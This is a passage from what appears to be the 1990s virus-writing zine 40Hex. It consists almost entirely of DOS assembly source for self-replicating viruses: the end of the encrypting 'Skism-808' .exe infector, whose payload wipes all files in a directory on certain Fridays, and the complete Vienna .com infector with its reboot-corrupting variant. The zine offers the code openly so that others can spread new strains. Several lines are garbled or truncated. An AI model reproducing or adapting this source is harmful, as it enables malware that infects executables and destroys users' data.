                   MOV     BX,HANDLE                 ;LOAD BX WITH HANDLE

                   PUSH    BX                        ;SAVE HANDLE ON STACK

                   CALL    ENCRYPT                   ;ENCRYPT FILE

                   POP     BX                        ;GET BACK BX

                   MOV     CX,VIRUS_SIZE             ;NUMBER OF BYTES TO WRITE

                   MOV     AH,40H                    ;WRITE TO FILE

                   INT     21H                       ;

                   PUSH    BX

                   CALL    ENCRYPT                   ;FIX UP THE MESS

                   POP     BX

                   RET
VIRUS_CODE:
WILDCARDS    DB     "*",0              ;SEARCH FOR DIRECTORY ARGUMENT

FILESPEC     DB     "*.exe",0          ;SEARCH FOR exe FILE ARGUMENT

FILESPEC2    DB     "*.*",0

ROOTDIR      DB     "\",0              ;ARGUMENT FOR ROOT DIRECTORY

DIRDATA      DB     43 DUP (?)         ;HOLDS DIRECTORY dta

FILEDATA     DB     43 DUP (?)         ;HOLDS FILES dta

DISKDTASEG   DW     ?                  ;HOLDS DISK DTA SEGMENT

DISKDTAOFS   DW     ?                  ;HOLDS DISK DTA OFFSET

TEMPOFS      DW     ?                  ;HOLDS OFFSET

TEMPSEG      DW     ?                  ;HOLDS SEGMENT

DRIVECODE    DB     ?                  ;HOLDS DRIVE CODE

CURRENTDIR   DB     64 DUP (?)         ;SAVE CURRENT DIRECTORY INTO THIS

HANDLE       DW     ?                  ;HOLDS FILE HANDLE

ORIG_TIME    DW     ?                  ;HOLDS FILE TIME

ORIG_DATE    DW     ?                  ;HOLDS FILE DATE

ORIG_ATTR    DW     ?                  ;HOLDS FILE ATTR

IDBUFFER     DW     2 DUP  (?)         ;HOLDS VIRUS ID


VIRUS:       MOV    AX,3000H           ;GET DOS VERSION

             INT    21H                       ;

             CMP    AL,02H                    ;IS IT AT LEAST 2.00?

             JB     BUS1                      ;WON'T INFECT LESS THAN 2.00

             MOV    AH,2CH                    ;GET TIME

             MOV    ENCRYPT_VAL,DL            ;SAVE M_SECONDS TO ENCRYPT VAL SO

                                              ;THERES 100 MUTATIONS POSSIBLE

SETDTA:      MOV     DX,OFFSET DIRDATA        ;OFFSET OF WHERE TO HOLD NEW DTA

             MOV     AH,1AH                    ;SET DTA ADDRESS

             INT     21H                       ;

NEWDIR:


             MOV     AH,19H                    ;GET DRIVE CODE

             INT     21H                       ;

             MOV     DL,AL                     ;SAVE DRIVECODE

             INC     DL             ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER

             MOV     AH,47H                    ;GET CURRENT DIRECTORY

             MOV     SI, OFFSET CURRENTDIR     ;BUFFER TO SAVE DIRECTORY IN

             INT     21H                       ;


             MOV     DX,OFFSET ROOTDIR     ;MOVE DX TO CHANGE TO ROOT DIRECTORY

             MOV     AH,3BH                    ;CHANGE DIRECTORY TO ROOT

             INT     21H                       ;

SCANDIRS:


             MOV     CX,13H                    ;INCLUDE HIDDEN/RO DIRECTOYS
             MOV     DX, OFFSET WILDCARDS      ;LOOK FOR '*'

             MOV     AH,4EH                    ;FIND FIRST FILE

             INT     21H                       ;

             CMP     AX,12H                    ;NO FIRST FILE?

             JNE     DIRLOOP                   ;NO DIRS FOUND? BAIL OUT


BUS1:
             JMP    BUS
DIRLOOP:
             MOV     AH,4FH                    ;FIND NEXT FILE

             INT     21H                       ;

             CMP     AX,12H
             JE      BUS                       ;NO MORE DIRS FOUND, ROLL OUT


CHDIR:
             MOV     DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME

             MOV     AH,3BH                    ;CHANGE DIRECTORY

             INT     21H                       ;


             MOV     AH,2FH                    ;GET CURRENT DTA ADDRESS

             INT     21H                       ;

             MOV     [DISKDTASEG],ES           ;SAVE OLD SEGMENT

             MOV     [DISKDTAOFS],BX           ;SAVE OLD OFFSET

             MOV     DX,OFFSET FILEDATA        ;OFFSET OF WHERE TO HOLD NEW DTA

             MOV     AH,1AH                    ;SET DTA ADDRESS

             INT     21H            ;
SCANDIR:
             MOV     CX,07H                    ;FIND ANY ATTRIBUTE

             MOV     DX,OFFSET FILESPEC        ;POINT DX TO "*.com",0

             MOV     AH,4EH                    ;FIND FIRST FILE FUNCTION

             INT     21H                       ;

             CMP     AX,12H                    ;WAS FILE FOUND?

             JNE     TRANSFORM


NEXTEXE:
             MOV     AH,4FH                    ;FIND NEXT FILE

             INT     21H                       ;

             CMP     AX,12H                    ;NONE FOUND

             JNE     TRANSFORM                ;FOUND SEE WHAT WE CAN DO


             MOV     DX,OFFSET ROOTDIR     ;MOVE DX TO CHANGE TO ROOT DIRECTORY

             MOV     AH,3BH                    ;CHANGE DIRECTORY TO ROOT

             INT     21H                       ;

             MOV     AH,1AH                    ;SET DTA ADDRESS

             MOV     DS,[DISKDTASEG]           ;RESTORE OLD SEGMENT

             MOV     DX,[DISKDTAOFS]           ;RESTORE OLD OFFSET

             INT     21H                       ;

             JMP     DIRLOOP
BUS:
             JMP     NSFORM:     M
             MOV     AH,2FH                  ;TEMPORALLY STORE DTA

             INT     21H                       ;

             MOV     [TEMPSEG],ES              ;SAVE OLD SEGMENT

             MOV     [TEMPOFS],BX              ;SAVE OLD OFFSET

             MOV     DX, OFFSET FILEDATA + FILENAME


             MOV     BX,OFFSET FILEDATA               ;SAVE FILE...

             MOV     AX,[BX]+FILEDATE          ;DATE

             MOV     ORIG_DATE,AX              ;

             MOV     AX,[BX]+FILETIME          ;TIME

             MOV     ORIG_TIME,AX              ;    AND

             MOV     AX,[BX]+FILEATTR          ;

             MOV     AX,4300H

             INT     21H

             MOV     ORIG_ATTR,CX

             MOV     AX,4301H                  ;CHANGE ATTRIBUTES

             XOR     CX,CX                     ;CLEAR ATTRIBUTES

             INT     21H                       ;

             MOV     AX,3D00H                  ;OPEN FILE - READ

             INT     21H                       ;

             JC      FIXUP                     ;ERROR - FIND ANOTHER FILE

             MOV     HANDLE,AX                 ;SAVE HANDLE

             MOV     AH,3FH                    ;READ FROM FILE

             MOV     BX,HANDLE                 ;MOVE HANDLE TO BX

             MOV     CX,02H                    ;READ 2 BYTES

             MOV     DX,OFFSET IDBUFFER        ;SAVE TO BUFFER

             INT     21H                       ;


             MOV     AH,3EH                    ;CLOSE FILE FOR NOW

             MOV     BX,HANDLE                 ;LOAD BX WITH HANDLE

             INT     21H                       ;


             MOV     BX, IDBUFFER              ;FILL BX WITH ID STRING

             CMP     BX,02EBH                  ;INFECTED?

             JNE     DOIT                      ;SAME - FIND ANOTHER FILE



FIXUP:
             MOV     AH,1AH                    ;SET DTA ADDRESS

             MOV     DS,[TEMPSEG]              ;RESTORE OLD SEGMENT

             MOV     DX,[TEMPOFS]              ;RESTORE OLD OFFSET

             INT     21H                       ;

             JMP     NEXTEXE
DOIT:
             MOV     DX, OFFSET FILEDATA + FILENAME

             MOV     AX,3D02H                  ;OPEN FILE READ/WRITE ACCESS

             INT     21H                       ;

             MOV     HANDLE,AX                 ;SAVE HANDLE


             CALL    INFECTFILE

 ;
             MOV     AX,3EH                    ;CLOSE FILE
     ;
             INT     21H
ROLLOUT:
             MOV     AX,5701H               

             MOV     BX,HANDLE                 ;

             MOV     CX,ORIG_TIME              ;TIME AND

             MOV     DX,ORIG_DATE              ;DATE

             INT     21H                       ;


             MOV     AX,4301H                  ;RESTORE ORIGINAL ATTRIBUTES

             MOV     CX,ORIG_ATTR
     MOV     DX,OFFSET FILEDATA + FILENAME

             INT     21H                       ;
             MOV     BX,HANDLE
             MOV     AX,3EH                    ;CLOSE FILE
     ;
             INT     21H
             MOV     AH,3BH                    ;TRY TO FIX THIS

             MOV     DX,OFFSET ROOTDIR         ;FOR SPEED

             INT     21H                       ;

             MOV     AH,3BH                    ;CHANGE DIRECTORY

             MOV     DX,OFFSET CURRENTDIR      ;BACK TO ORIGINAL

             INT     21H                       ;

             MOV     AH,2AH                    ;CHECK SYSTEM DATE

             INT     21H                       ;

             CMP     CX,1991                   ;IS IT AT LEAST 1991?

             JB      AUDI                      ;NO? DON'T DO IT NOW

             CMP     DL,25                     ;IS IT THE 25TH?

             JB      AUDI                      ;NOT YET? QUIT

             CMP     AL,5                      ;IS fRIDAY?

             JNE     AUDI                      ;NO? QUIT

             MOV     DX,OFFSET DIRDATA         ;OFFSET OF WHERE TO HOLD NEW DTA

             MOV     AH,1AH                    ;SET DTA ADDRESS

             INT     21H                       ;

             MOV     AH,4EH                    ;FIND FIRST FILE

             MOV     CX,7H                     ;

             MOV     DX,OFFSET FILESPEC2       ;OFFSET *.*


lOOPS:
             INT     21H                       ;

             JC      AUDI                      ;ERROR? THEN QUIT

             MOV     AX,4301H                  ;FIND ALL NORMAL FILES

             XOR     CX,CX                     ;

             INT     21H                       ;

             MOV     DX,OFFSET DIRDATA + FILENAME

             MOV     AH,3CH                 ;FUCK UP ALL FILES IN CURRENT DIR

             INT     21H                       ;ERROR? QUIT

             MOV     AH,4FH                    ;FIND NEXT FILE

             JMP     LOOPS                     ;


AUDI:
             MOV     AX,4C00H                  ;END PROGRAM

             INT     21H                       ;

;  THE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES.  dON'T
;  JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.



WORDS_   DB   "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0

WORDS2   DB   "  dONT ALTER THIS CODE INTO Y3
         DB "  hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0

WORDS4   DB   "  yOU SISSYS.....",0


MAIN     ENDP

CODE     ENDS

END      MAIN



------------------------------------------------------------------------------


40hEX vOLUME 1 iSSUE 2
0011


         vIENNA AND vIOLATOR vIRUSES


         tHE vIENNA VIRUS, SINCE ITS SOURCE CODE WAS RELEASED, HAS BECOME

         ONE OF THE MOST COMMON VIRUSES EVER.  nOT ONLY THAT BUT THERE ARE

         OVER 20 KNOWN STRAINS OF THIS VIRUS.  wE AT 40hEX WANT TO ADD ON TO

         THE LIST BY GIVING OUT THE SOURCE FOR THE ORIGINAL vIENNA VIRUS AS

         WELL AS THE vIOLATOR-b SOURCE BY rABID.


------------------------------------------------------------------------------


mov_cx  macro   x
        db      0b9h

                          dw      x

                          endm



code    segment
        assume ds:code,ss:code,cs:code,es:code

org     $+0100h

;*****************************************************************************
; sTART OUT WITH A jmp AROUND THE REMAINS OF THE ORIGINAL .com FILE, INTO THE
; VIRUS. tHE ACTUAL .com FILE WAS JUST AN int 20, FOLLOWED BY A BUNCH OF nops.
; tHE REST OF THE FILE (FIRST 3 BYTES) ARE STORED IN THE VIRUS DATA AREA.
;*****************************************************************************


vcode:  jmp     VIRUS



;tHIS WAS THE REST  OF THE ORIGINAL .com FILE. tINY AND SIMPLE, THIS TIME


nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop



;************************************************************
;
             tHE ACTUAL VIRUS STARTS HERE

;************************************************************


V_START EQU     $



VIRUS:  push    cx

        mov     dx,offset VIR_DAT       ;tHIS IS WHERE THE VIRUS DATA STARTS.

                                        ; tHE 2ND AND 3RD BYTES GET MODIFIED.

        cld                             ;pOINTERS WILL BE AUTO inCREMENTED

        mov     si,dx                   ;aCCESS DATA AS OFFSET FROM si

        add     si,FIRST_3              ;pOINT TO ORIGINAL 1ST 3 BYTES OF .com

        mov     di,offset 100h          ;CAUSE ALL .com FILES START AT 100h

        mov     cx,3
        repz    movsb                   ;rESTORE ORIGINAL FIRST 3 BYTES OF .com

        mov     si,dx                   ;kEEP si POINTING TO THE DATA AREA


;*******************************************************
;
         cHECK THE dos VERSION

;*************************************************************;
        mov     ah,30h

        int     21h


        cmp     al,0                    ;0 MEANS IT'S VERSION 1.x


        jnz     DOS_OK                  ;fOR VERSION 2.0 OR GREATER

        jmp     QUIT                    ;dON'T TRY TO INFECT VERSION 1.x



;*************************************************************;
   hERE IF THE dos VERSION IS HIGH ENOUGH FOR THIS TO WORK

;*************************************************************;
DOS_OK:
         push    es



;*************************************************************
;
         gET dta ADDRESS INTO es:bx

;*************************************************************;
       mov     ah,2fh

       int     21h


;*************************************************************;
                    sAVE THE dta ADDRESS

;*************************************************************;
      mov     [si+OLD_DTA],bx

      mov     [si+OLD_DTS],es         ;sAVE THE dta ADDRESS


      pop     es
;*************************************************************
;
sET dta TO POINT INSIDE THE VIRUS DATA AREA

;*************************************************************


      mov     dx,DTA                  ;oFFSET OF NEW dta IN VIRUS DATA AREA
;
      nop                             ;masm WILL ADD THIS nop HERE

      add     dx,si                   ;cOMPUTE dta ADDRESS

      mov     ah,1ah

      int     21h                    ;sET NEW dta TO INSIDE OUR OWN CODE



      push    es

      push    si

      mov     es,ds:2ch

      mov     di,0                    ;es:di POINTS TO ENVIRONMENT


;************************************************************
;
     fIND THE "path=" STRING IN THE ENVIRONMENT

;************************************************************


FIND_PATH:
      pop     si

      push    si                      ;gET si BACK

      add     si,ENV_STR              ;pOINT TO "path=" STRING IN DATA AREA

      lodsb
      mov     cx,offset 8000h         ;eNVIRONMENT CAN BE 32768 BYTES LONG

      repnz   scasb                   ;sEARCH FOR FIRST CHARACTER

      mov     cx,4
      ;************************************************************
;
      lOOP TO CHECK FOR THE NEXT FOUR CHARACTERS

      ;************************************************************


CHECK_NEXT_4:
     lodsb

     scasb

     jnz     FIND_PATH               ;iF NOT ALL THERE, ABORT & START OVER

     loop    CHECK_NEXT_4            ;lOOP TO CHECK THE NEXT CHARACTER


     pop     si

     pop     es

     mov     [si+PATH_AD],di         ;sAVE THE ADDRESS OF THE path

     mov     di,si

     add     di,WRK_SPC              ;fILE NAME WORKSPACE

     mov     bx,si                   ;sAVE A COPY OF si

     add     si,WRK_SPC              ;pOINT si TO WORKSPACE

     mov     di,si                   ;pOINT di TO WORKSPACE

     jmp     short   SLASH_OK



 ;**********************************************************
;
 lOOK IN THE path FOR MORE SUBDIRECTORIES, IF ANY

 ;**********************************************************


 SET_SUBDIR:
     cmp     word ptr [si+PATH_AD],0 ;iS path STRING ENDED?

     jnz     FOUND_SUBDIR            ;iF NOT, THERE ARE MORE SUBDIRECTORIES

     jmp     ALL_DONE                ;eLSE, WE'RE ALL DONE



     ;**********************************************************
;
     hERE IF THERE ARE MORE SUBDIRECTORIES IN THE PATH

     ;**********************************************************


FOUND_SUBDIR:
     push    ds

     push    si

     mov     ds,es:2ch               ;ds POINTS TO ENVIRONMENT SEGMENT

     mov     di,si

     mov     si,es:[di+PATH_AD]      ;si = path ADDRESS

     add     di,WRK_SPC              ;di POINTS TO FILE NAME WORKSPACE


;
    ;***********************************************************
;
     mOVE SUBDIRECTORY NAME INTO FILE NAME WORKSPACE

     ;***********************************************************


MOVE_SUBDIR:
     lodsb        ;gET CHARACTER

     cmp     al,';'                  ;iS IT A ';' DELIMITER?

     jz      MOVED_ONE               ;yES, FOUND ANOTHER SUBDIRECTORY

     cmp     al,0                    ;eND OF path STRING?

     jz      MOVED_LAST_ONE          ;yES

     stosb                           ;sAVE path MARKER INTO [di]

     jmp     short   MOVE_SUB


     ;******************************************************************
;
     mARK THE FACT THAT WE'RE LOOKING THROUGH THE FINAL SUBDIRECTORY

     ;******************************************************************


MOVED_LAST_ONE:

     mov     si,0



     ;******************************************************************
;
                  hERE AFTER WE'VE MOVED A SUBDIRECTORY

     ;******************************************************************


MOVED_ONE:
      pop     bx                      ;pOINTER TO VIRUS DATA AREA

      pop     ds                      ;rESTORE ds

      mov     [bx+PATH_AD],si         ;aDDRESS OF NEXT SUBDIRECTORY

      nop


      ;******************************************************************
;
                   mAKE SURE SUBDIRECTORY ENDS IN A "\"

      ;******************************************************************


      cmp     ch,'\'                  ;eNDS WITH "\"?

      jz      SLASH_OK                ;iF YES

      mov     al,'\'                  ;aDD ONE, IF NOT

      stosb



      ;******************************************************************
;
           hERE AFTER WE KNOW THERE'S A BACKSLASH AT END OF SUBDIR

     ;******************************************************************


SLASH_OK:
       mov     [bx+NAM_PTR],di         ;sET FILENAME POINTER TO NAME WORKSPACE

       mov     si,bx                   ;rESTORE si

       add     si,F_SPEC               ;pOINT TO "*.com"

       mov     cx,6

       repz
       movsb                   ;mOVE "*.com",0 TO WORKSPACE


       mov     si,bx



       ;*******************************************************************
;
                      fIND FIRST STRING MATCHING *.com

      ;*****************************************************************;
      mov     ah,4eh

      mov     dx,WRK_SPC
;
      nop                             ;masm WILL ADD THIS nop HERE

      add     dx,si                   ;dx POINTS TO "*.com" IN WORKSPACE

      mov     cx,3                    ;aTTRIBUTES OF rEAD oNLY OR hIDDEN ok

      int     21h


      jmp     short
FIND_FIRST



;*******************************************************************
;             fIND NEXT asciiz STRING MATCHING *.com

;*******************************************************************


FIND_NEXT:
      mov     ah,4fh

      int     21h


FIND_FIRST:

     jnb     FOUND_FILE              ;jUMP IF WE FOUND IT

     jmp     short   SET_SUBDIR      ;oTHERWISE, GET ANOTHER SUBDIRECTORY


     ;*******************************************************************
;
                           hERE WHEN WE FIND A FILE

    ;*******************************************************************


FOUND_FILE:
     mov     ax,[si+DTA_TIM]     ;gET TIME FROM dta

     and     al,1fh              ;mASK TO REMOVE ALL BUT SECONDS

     cmp     al,1fh                  ;62 SECONDS -> ALREADY INFECTED

     jz      FIND_NEXT               ;iF SO, GO FIND ANOTHER FILE


     cmp     word ptr [si+DTA_LEN],offset 0fa00h ;iS THE FILE TOO LONG?

    ja      FIND_NEXT               ;iF TOO LONG, FIND ANOTHER ONE


    cmp     word ptr [si+DTA_LEN],0ah ;iS IT TOO SHORT?

    jb      FIND_NEXT               ;tHEN GO FIND ANOTHER ONE


    mov     di,[si+NAM_PTR]         ;di POINTS TO FILE NAME

    push    si                      ;sAVE si

    add     si,DTA_NAM              ;pOINT si TO FILE NAME


    ;********************************************************************
;
                    mOVE THE NAME TO THE END OF THE PATH

   ;********************************************************************


MORE_CHARS:

    lodsb

    stosb

    cmp     al,0

    jnz     MORE_CHARS              ;mOVE CHARACTERS UNTIL WE FIND A 00



    ;*************************************************************
;
                    gET fILE aTTRIBUTES

   ;********************************************************************;
   pop     si
   mov     ax,offset 4300h

   mov     dx,WRK_SPC              ;pOINT TO \PATH\NAME IN WORKSPACE
;
   nop                             ;masm WILL ADD THIS nop HERE

   add     dx,si

   int     21h



   mov     [si+OLD_ATT],cx         ;sAVE THE OLD ATTRIBUTES



   ;********************************************************************
;
            rEWRITE THE ATTRIBUTES TO ALLOW WRITING TO THE FILE

  ;********************************************************************;
  mov     ax,offset 4301h         ;sET ATTRIBUTES

  and     cx,offset 0fffeh        ;sET ALL EXCEPT "READ ONLY" (WEIRD)

  mov     dx,WRK_SPC              ;oFFSET OF \PATH\NAME IN WORKSPACE
;
  nop                             ;masm WILL ADD THIS nop HERE

  add     dx,si                   ;pOINT TO \PATH\NAME

  int     21h


  ;********************************************************************
;
                  oPEN rEAD/wRITE CHANNEL TO THE FILE

 ;********************************************************************


  mov     ax,offset 3d02h         ;rEAD/wRITE

  mov     dx,WRK_SPC              ;oFFSET TO \PATH\NAME IN WORKSPACE
;
  nop                             ;masm WILL ADD THIS nop HERE

  add     dx,si                   ;pOINT TO \PATH\NAME

  int     21h


  jnb     OPENED_OK             ;iF FILE WAS OPENED ok

  jmp     FIX_ATTR                ;iF IT FAILED, RESTORE THE ATTRIBUTES



  ;*******************************************************************
;
                          gET THE FILE DATE & TIME

  ;*******************************************************************


OPENED_OK:
  mov     bx,ax

  mov     ax,offset 5700h

  int     21h


  mov     [si+OLD_TIM],cx         ;sAVE FILE TIME

  mov     [si+OL_DATE],dx         ;sAVE THE DATE


  ;*******************************************************************
;
  gET CURRENT SYSTEM TIME

  ;*******************************************************************;
  mov     ah,2ch

  int     21h



  and     dh,7                    ;lAST 3 BITS 0? (ONCE IN EIGHT)

  jnz     SEVEN_IN_EIGHT



  ;*******************************************************************
  ; tHE SPECIAL "ONE IN EIGHT" INFECTION. iF THE ABOVE LINE WERE IN
  ; ITS ORIGINAL FORM, THIS CODE WOULD BE RUN 1/8 OF THE TIME, AND
  ; RATHER THAN APPENDING A COPY OF THIS VIRUS TO THE .com FILE, THE
  ; FILE WOULD GET 5 BYTES OF CODE THAT REBOOT THE SYSTEM WHEN THE
  ; .com FILE IS RUN.

  ;*******************************************************************



  mov     ah,40h                  ;wRITE TO FILE

  mov     cx,5                    ;fIVE BYTES

  mov     dx,si

  add     dx,REBOOT               ;oFFSET OF REBOOT CODE IN DATA AREA

  int     21h


  jmp     short   FIX_TIME_STAMP


  nop
  ;******************************************************************
;
        hERE'S WHERE WE INFECT A .com FILE WITH THIS VIRUS

  ;******************************************************************;
SEVEN_IN_EIGHT:
  mov     ah,3fh

  mov     cx,3

  mov     dx,FIRST_3
;
  nop                     ;masm WILL ADD THIS nop HERE

  add     dx,si

  int     21h             ;sAVE FIRST 3 BYTES INTO THE DATA AREA


  jb      FIX_TIME_STAMP  ;qUIT, IF READ FAILED


  cmp     ax,3            ;wERE WE ABLE TO READ ALL 3 BYTES?

  jnz     FIX_TIME_STAMP  ;qUIT, IF NOT
  ;******************************************************************
;
                mOVE FILE POINTER TO END OF FILE

 ;******************************************************************


 mov     ax,offset 4202h

 mov     cx,0

 mov     dx,0

 int     21h


 jb      FIX_TIME_STAMP     ;qUIT, IF IT DIDN'T WORK


 mov     cx,ax              ;dx:ax (LONG INT) = FILE SIZE

 mov     ax,3               ;sUBTRACT 3 (ok, SINCE dx MUST BE 0, HERE)

 mov     [si+JMP_DSP],ax    ;sAVE THE DISPLACEMENT IN A jmp INSTRUCTION


 add     cx,offset C_LEN_Y

 mov     di,si              ;pOINT di TO VIRUS DATA AREA

 sub     di,offset C_LEN_X
 ;pOINT di TO REFERENCE VIR_DAT, AT START OF PGM
 mov     [di],cx         ;mODIFY VIR_DAT REFERENCE:2ND, 3RD BYTES OF PGM



 ;*******************************************************************
;
WRITE VIRUS CODE TO FILE

;*******************************************************************


mov     ah,40h


mov_cx  VIRLEN                  ;lENGTH OF VIRUS, IN BYTES


mov     dx,si

sub     dx,offset CODELEN       ;lENGTH OF VIRUS CODE, GIVES STARTING

                                ; ADDRESS OF VIRUS CODE IN MEMORY

int     21h


jb      FIX_TIME_STAMP          ;jUMP IF ERROR


cmp     ax,offset VIRLEN        ;aLL BYTES WRITTEN?

jnz    FIX_TIME_STAMP          ;jUMP IF ERROR



;**********************************************************************
;
                mOVE FILE POINTER TO BEGINNING OF THE FILE

;**********************************************************************;
 mov     ax,offset 4200h

 mov     cx,0

 mov     dx,0

 int     21h


 jb      FIX_TIME_STAMP          ;jUMP IF ERROR



 ;**********************************************************************
;              wRITE THE 3 BYTE jmp TO THE START OF THE FILE

;**********************************************************************

mov     ah,40h

mov     cx,3

mov     dx,si                   ;vIRUS DATA AREA

add     dx,JMP_OP               ;pOINT TO THE RECONSTRUCTED jmp

int     21h



;**********************************************************************
;
       rESTORE OLD FILE DATE & TIME, WITH SECONDS MODIFIED TO 62

;*********************************************************************


FIX_TIME_STAMP:
mov

mov     cx,[si+OLD_TIM]         ;oLD FILE TIME

and     cx,offset 0ffe0h

or      cx,1fh                  ;sECONDS = 31/30 MIN = 62 SECONDS

mov     ax,offset 5701h

int     21h
;**********************************************************************
;
                         cLOSE fILE

;**********************************************************************;
mov     ah,3eh

int     21h



;**********************************************************************
;
                     rESTORE oLD fILE aTTRIBUTES

;**********************************************************************


FIX_ATTR:
mov     ax,offset 4301h

mov     cx,[si+OLD_ATT]         ;oLD aTTRIBUTES

mov     dx,WRK_SPC
;
nop                             ;masm WILL ADD THIS nop

add     dx,si                   ;dx POINTS TO \PATH\NAME IN WORKSPACE

int     21h


;**********************************************************************
;
              hERE WHEN IT'S TIME TO CLOSE IT UP & END

;**********************************************************************


ALL_DONE:

push    ds
;**********************************************************************
;
                         rESTORE OLD dta

;**********************************************************************


mov     ah,1ah

mov     dx,[si+OLD_DTA]

mov     ds,[si+OLD_DTS]

int     21h


pop     ds


;*************************************************************************
; cLEAR REGISTERS USED, & DO A WEIRD KIND OF jmp 100. tHE WEIRDNESS COMES
; IN SINCE THE ADDRESS IN A REAL jmp 100 IS AN OFFSET, AND THE OFFSET
; VARIES FROM ONE INFECTED FILE TO THE NEXT. bY pushING AN 0100h ONTO THE
; STACK, WE CAN ret TO ADDRESS 0100h JUST AS THOUGH WE jmpED THERE.

;**********************************************************************


QUIT:

pop     cx

xor     ax,ax

xor     bx,bx

xor     dx,dx

xor     si,si

mov     di,offset 0100h

push    di

xor     di,di


ret     0ffffh


;************************************************************************
; tHE VIRUS DATA STARTS HERE. iT'S ACCESSED OFF THE si REGISTER, PER THE
; COMMENTS AS SHOWN

;************************************************************************


VIR_DAT equ     $


        ;uSE THIS WITH (si + OLD_DTA)

OLDDTA_ dw      0           ;oLD dta OFFSET


                            ;uSE THIS WITH (si + OLD_DTS)

OLDDTS_ dw      0           ;oLD dta SEGMENT


                            ;uSE THIS WITH (si + OLD_TIM)

OLDTIM_ dw      0           ;oLD tIME


                            ;uSE THIS WITH (si + OL_DATE)

OLDATE_ dw      0           ;oLD DATE


                            ;uSE THIS WITH (si + OLD_ATT)

OLDATT_ dw      0           ;oLD FILE ATTRIBUTES




;hERE'S WHERE THE FIRST THREE BYTES OF THE ORIGINAL .com FILE GO.(si + FIRST_3)


FIRST3_ equ     $

int     20h

nop




;hERE'S WHERE THE NEW jmp INSTRUCTION IS WORKED OUT


;uSE THIS WITH (si + JMP_OP)

JMPOP_  db      0e9h                    ;sTART OF jmp INSTRUCTION


                                       ;uSE THIS WITH (si + JMP_DSP)

JMPDSP_ dw      0                       ;tHE DISPLACEMENT PART




;tHIS IS THE TYPE OF FILE  WE'RE LOOKING TO INFECT. (si + F_SPEC)


FSPEC_  db      '*.com',0

        ;uSE THIS WITH (si + PATH_AD)

PATHAD_ dw      0                       ;pATH ADDRESS


                                   ;uSE THIS WITH (si + NAM_PTR)

NAMPTR_ dw      0              ;pOINTER TO START OF FILE NAME


                               ;uSE THIS WITH (si + ENV_STR)

ENVSTR_ db      'path='       ;fIND THIS IN THE ENVIRONMENT


                              ;fILE NAME WORKSPACE (si + WRK_SPC)

WRKSPC_ db      40H DUP (0)

        ;uSE THIS WITH (si + DTA)

DTA_    db      16H DUP (0)         ;tEMPORARY dta GOES HERE


                                    ;uSE THIS WITH (s
iDTATIM_ dw      0,0                ;tIME STAMP IN dta
                                    ;uSE THIS WITH (si + DTA_LEN)

DTALEN_ dw      0,0               ;fILE LENGTH IN THE dta
                                  ;uSE THIS WITH (si + DTA_NAM)

DTANAM_ db      0dH DUP (0)       ;fILE NAME IN THE dta


                                  ;uSE THIS WITH (si + REBOOT)

REBOOT_ db      0eah,0f0h,0ffh,0ffh,0ffh ;fIVE BYTE far jmp TO ffff:fff0



LST_BYT equ     $                 ;aLL LINES THAT ASSEMBLE INTO CODE ARE

                                  ;  ABOVE THIS ONE



;*****************************************************************************
; tHE VIRUS NEEDS TO KNOW A FEW DETAILS ABOUT ITS OWN SIZE AND THE SIZE OF ITS
; CODE PORTION. lET THE ASSEMBLER FIGURE OUT THESE SIZES AUTOMATICALLY.

;*****************************************************************************
VIRLEN  =       LST_BYT - V_START       ;lENGTH, IN BYTES, OF THE ENTIRE VIRUS

CODELEN =       VIR_DAT - V_START       ;lENGTH OF VIRUS CODE, ONLY

C_LEN_X =       VIR_DAT - V_START - 2   ;dISPLACEMENT FOR SELF-MODIFYING CODE

C_LEN_Y =       VIR_DAT - V_START + 100h ;cODE LENGTH + 100H, FOR psp



;*****************************************************************************
; bECAUSE THIS CODE IS BEING APPENDED TO THE END OF AN EXECUTABLE FILE, THE
; EXACT ADDRESS OF ITS VARIABLES CANNOT BE KNOWN. aLL ARE ACCESSED AS OFFSETS
; FROM si, WHICH IS REPRESENTED AS VIR_DAT IN THE BELOW DECLARATIONS.

;*****************************************************************************


OLD_DTA =       OLDDTA_ - VIR_DAT       ;dISPLACEMENT TO THE OLD dta OFFSET

OLD_DTS =       OLDDTS_ - VIR_DAT       ;dISPLACEMENT TO THE OLD dta SEGMENT

OLD_TIM =       OLDTIM_ - VIR_DAT       ;dISPLACEMENT TO OLD FILE TIME STAMP

OL_DATE =       OLDATE_ - VIR_DAT       ;dISPLACEMENT TO OLD FILE DATE STAMP

OLD_ATT =       OLDATT_ - VIR_DAT       ;dISPLACEMENT TO OLD ATTRIBUTES

FIRST_3 =       FIRST3_ - VIR_DAT       ;dISPLACEMENT-1ST 3 BYTES OF OLD .com

JMP_OP  =       JMPOP_  - VIR_DAT       ;dISPLACEMENT TO THE jmp OPCODE

JMP_DSP =       JMPDSP_ - VIR_DAT       ;dISPLACEMENT TO THE 2ND 2 BYTES OF jmp

F_SPEC  =       FSPEC_  - VIR_DAT       ;dISPLACEMENT TO THE "*.com" STRING

PATH_AD =       PATHAD_ - VIR_DAT       ;dISPLACEMENT TO THE PATH ADDRESS

NAM_PTR =       NAMPTR_ - VIR_DAT       ;dISPLACEMENT TO THE FILENAME POINTER

ENV_STR =       ENVSTR_ - VIR_DAT       ;dISPLACEMENT TO THE "path=" STRING

WRK_SPC =       WRKSPC_ - VIR_DAT       ;dISPLACEMENT TO THE FILENAME WORKSPACE

DTA     =       DTA_    - VIR_DAT       ;dISPLACEMENT TO THE TEMPORARY dta

DTA_TIM =       DTATIM_ - VIR_DAT       ;dISPLACEMENT TO THE TIME IN THE dta

DTA_LEN =       DTALEN_ - VIR_DAT       ;dISPLACEMENT TO THE LENGTH IN THE dta

DTA_NAM =       DTANAM_ - VIR_DAT       ;dISPLACEMENT TO THE NAME IN THE dta

REBOOT  =       REBOOT_ - VIR_DAT       ;dISPLACEMENT TO THE 5 BYTE REBOOT CODE

     code    ends

     end     vcode
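
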